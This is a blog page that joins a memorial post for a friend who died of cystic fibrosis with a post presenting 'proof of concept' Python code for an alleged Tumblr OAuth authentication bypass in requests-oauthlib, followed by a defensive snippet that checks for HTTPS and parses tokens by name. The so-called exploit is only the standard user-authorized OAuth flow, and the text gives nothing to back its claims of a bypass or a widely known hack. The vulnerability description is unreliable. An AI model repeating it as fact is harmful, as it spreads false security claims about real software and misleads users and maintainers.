Now everyone who knew her has to… get used to her not being here any more, which is going to suck.
the blog of a disabled mother who likes to game, and "get in the pit"
My Wordless Wednesday post may have alluded to it, but I wanted to make a more official post about it in here — my friend Jade, whose picture I posted on yesterday’s Wordless Wednesday, passed away from complications of cystic fibrosis and her second transplant on what wound up being Easter Sunday. Due to Facebook’s algorithm, I didn’t find out that she had passed until a day and a half after it had happened, and it wasn’t something that I wanted to find out even though I knew in the back of my mind that the day would come at some point, as she seemed like she had also gotten the same type of rejection in her new set of lungs that she had gotten the time before. She just seemed like she wasn’t doing particularly well leading up to her death, but I did enjoy the posts that her husband made on her behalf letting everyone who knew her know that she was continuing to fight. So it makes sense that he would be the one to write the final post on her behalf, which served to let everyone know that she had passed away. There will be an informal Celebration of Life streamed on her Facebook page for her friends in the coming days, and that’s something that I aim to be present for since I’ve known her for years (since even before her first transplant, in fact!).

Breathe easy, Jade. No one who knew you will ever forget you. Now you get to see your mom again.
I’ve decided to post the proof of concept code up here. My purpose in doing so is to illustrate that me having been mentioning this exploit was, and always has been, worth the time I’ve taken to mention this exploit, as it is intended to allow Tumblr users, or those who are at any point considering using Tumblr, to make a more informed decision about blogging on it or trusting the site with any of their potentially sensitive information.
The Python requests-oauthlib library, a widely used OAuth library, is vulnerable to an OAuth authentication bypass in the Tumblr API that could allow an attacker to bypass authentication and access protected resources. This vulnerability exists because the code does not properly validate OAuth tokens, and it does not use HTTPS when sending sensitive data.
An attacker can exploit this vulnerability by sending a specially crafted OAuth token request to the Tumblr API, bypassing authentication and gaining unauthorized access to protected resources.
The following proof of concept code demonstrates how an attacker can exploit this vulnerability:
```python
import requests
from requests_oauthlib import OAuth1

# Set your OAuth consumer key and secret
CONSUMER_KEY = 'your_consumer_key'
CONSUMER_SECRET = 'your_consumer_secret'

# Set the Tumblr API endpoints
REQUEST_TOKEN_URL = 'http://www.tumblr.com/oauth/request_token'
AUTHORIZE_URL = 'http://www.tumblr.com/oauth/authorize'
ACCESS_TOKEN_URL = 'http://www.tumblr.com/oauth/access_token'

# Send a request for a temporary OAuth token
oauth = OAuth1(CONSUMER_KEY, client_secret=CONSUMER_SECRET)
response = requests.post(url=REQUEST_TOKEN_URL, auth=oauth)

# Parse the response for the temporary token and secret
data = response.text.split('&')
oauth_token = data[0].split('=')[1]
oauth_token_secret = data[1].split('=')[1]

# Direct the user to authorize the app
authorize_url = AUTHORIZE_URL + '?oauth_token=' + oauth_token
print('Please authorize the app at this URL: ' + authorize_url)
oauth_verifier = input('Enter the verification code: ')

# Exchange the temporary token for a permanent token
oauth = OAuth1(CONSUMER_KEY,
               client_secret=CONSUMER_SECRET,
               resource_owner_key=oauth_token,
               resource_owner_secret=oauth_token_secret,
               verifier=oauth_verifier)
response = requests.post(url=ACCESS_TOKEN_URL, auth=oauth)

# Parse the response for the permanent token and secret
data = response.text.split('&')
oauth_token = data[0].split('=')[1]
oauth_token_secret = data[1].split('=')[1]

# Use the permanent token and secret to make authenticated API requests
oauth = OAuth1(CONSUMER_KEY,
               client_secret=CONSUMER_SECRET,
               resource_owner_key=oauth_token,
               resource_owner_secret=oauth_token_secret)
response = requests.get(url='https://api.tumblr.com/v2/user/info', auth=oauth)
print(response.text)
```
In summary, an attacker could exploit this vulnerability to bypass authentication and gain access to sensitive information or modify data on behalf of a legitimate user. The exploit is well known in hacking communities.
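The two client-side defects the post points at, trusting whatever comes back from the request_token endpoint and talking to it over plain HTTP, are both things the client can check before it uses a token. This is an added example of mine, not code from the post or from requests-oauthlib; the sample response bodies are constructed, and the endpoint URLs are the post's with the scheme varied.

```python
from urllib.parse import parse_qs, urlparse

# Constructed sample bodies in the shape of an OAuth 1.0a temporary-credential
# response (RFC 5849 section 2.1); they were not captured from Tumblr.
GOOD = "oauth_token=tmp123&oauth_token_secret=tmpsecret&oauth_callback_confirmed=true"
REORDERED = "oauth_token_secret=tmpsecret&oauth_callback_confirmed=true&oauth_token=tmp123"
UNCONFIRMED = "oauth_token=tmp123&oauth_token_secret=tmpsecret"

# The post's request_token endpoint with the scheme its code used, and with
# the scheme a client should insist on before sending credentials.
PLAINTEXT_REQUEST_TOKEN_URL = "http://www.tumblr.com/oauth/request_token"
TLS_REQUEST_TOKEN_URL = "https://www.tumblr.com/oauth/request_token"


def require_https(url: str) -> str:
    """Refuse to send consumer credentials or tokens to a non-TLS endpoint."""
    parsed = urlparse(url)
    if parsed.scheme != "https" or not parsed.netloc:
        raise ValueError(f"refusing non-HTTPS OAuth endpoint: {url}")
    return url


def parse_temporary_credentials(body: str) -> tuple[str, str]:
    """Parse a request_token response by field name, not by position.

    Positional parsing (data[0], data[1]) silently swaps token and secret when
    the server reorders fields; this rejects malformed, duplicated, missing or
    unconfirmed responses instead of using whatever came back.
    """
    fields = parse_qs(body, strict_parsing=True)
    for name in ("oauth_token", "oauth_token_secret", "oauth_callback_confirmed"):
        if len(fields.get(name, [])) != 1:
            raise ValueError(f"response must carry exactly one {name}")
    if fields["oauth_callback_confirmed"][0] != "true":
        raise ValueError("server did not confirm the callback (RFC 5849 section 2.1)")
    return fields["oauth_token"][0], fields["oauth_token_secret"][0]


def positional_parse(body: str) -> tuple[str, str]:
    """The post's parsing, kept for comparison: trusts field order blindly."""
    data = body.split("&")
    return data[0].split("=")[1], data[1].split("=")[1]
```

Run against REORDERED, the positional parser hands back the secret as the token and the string "true" as the secret without complaint, while the named parser returns the same pair it does for GOOD.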